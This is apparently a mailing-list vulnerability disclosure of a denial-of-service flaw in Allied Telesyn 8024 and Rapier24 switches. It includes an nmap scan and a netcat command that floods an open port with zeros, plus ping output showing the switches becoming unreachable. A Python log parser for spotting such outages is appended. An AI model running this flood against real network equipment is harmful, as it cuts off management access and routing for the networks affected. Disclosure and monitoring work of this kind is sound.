Hello, all

The problem: Zero stream DoS switch!

We have tested switches of Allied Telesyn, 8024 and Rapier24.
We have installed the latest firmware from the AT site.

Testing:

1. Scan for open ports on the switch (assume switch address 192.168.0.13):

    nmap -v -sT 192.168.0.13

    Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
    Host (192.168.0.103) appears to be up ... good.
    Initiating Connect() Scan against (192.168.0.103)
    Adding TCP port 23 (state open).
    Adding TCP port 80 (state open).
    The Connect() Scan took 4 seconds to scan 1542 ports.
    Interesting ports on (192.168.0.103):
    (The 1540 ports scanned but not shown below are in state: closed)
    Port       State       Service
    23/tcp     open        telnet
    80/tcp     open        http

    Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds

2. Send a stream of zeros to an open port, or to any port in the case of the 8024:

    cat /dev/zero | nc -u 192.168.0.13 Open_Port &

    Pinging 192.168.0.103 with 32 bytes of data:

    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time=16ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Request timed out.
    // Start sending zero stream: cat /dev/zero | nc -u 192.168.0.103 6789
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.
    // Stop sending zero stream
    Reply from 192.168.0.103: bytes=32 time=203ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30

So, in the case of the 8024 it stops responding on the management interface, and in the case of the Rapier24 it stops management interface access and routing also.

The bug was reported to Allied Telesyn in July...

Best Regards,
Oleg A. Lebedev
"Matrix Network Solutions" CIO
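
Added example, not part of the original post: a monitoring-side parser for ping transcripts in the format quoted above, reporting each run of consecutive lost probes and the first round-trip time after recovery, so a loss of management-plane reachability like the one shown can be flagged from availability logs. The function name, the `min_lost` threshold and the sample transcript are assumptions made for this illustration.

```python
import re

# Matches the Windows ping reply lines quoted in the post.
REPLY = re.compile(r"Reply from (\S+): bytes=\d+ time[<=](\d+)ms TTL=\d+")
TIMEOUT = "Request timed out."

# Constructed sample in the same format as the transcript in the post.
SAMPLE = """\
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time=16ms TTL=30
Request timed out.
// annotation lines such as this one are ignored
Request timed out.
Request timed out.
Request timed out.
Reply from 192.168.0.103: bytes=32 time=203ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Request timed out.
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
"""

def outage_windows(transcript, min_lost=3):
    """Return one dict per run of at least min_lost consecutive lost probes."""
    windows, run_start, lost, probe = [], None, 0, 0
    for line in transcript.splitlines():
        line = line.strip()
        m = REPLY.match(line)
        if line == TIMEOUT:
            probe += 1
            if lost == 0:
                run_start = probe          # 1-based index of first lost probe
            lost += 1
        elif m:
            probe += 1
            if lost >= min_lost:
                # "time<10ms" is recorded as 10, i.e. an upper bound.
                windows.append({"first_lost_probe": run_start, "lost": lost,
                                "recovery_rtt_ms": int(m.group(2))})
            lost = 0
        # Any other line (banner, annotation) is not a probe result.
    if lost >= min_lost:                   # still unreachable at end of log
        windows.append({"first_lost_probe": run_start, "lost": lost,
                        "recovery_rtt_ms": None})
    return windows

if __name__ == "__main__":
    for w in outage_windows(SAMPLE):
        print(w)
```

A single lost probe is treated as noise by default; lowering `min_lost` to 1 reports every timeout.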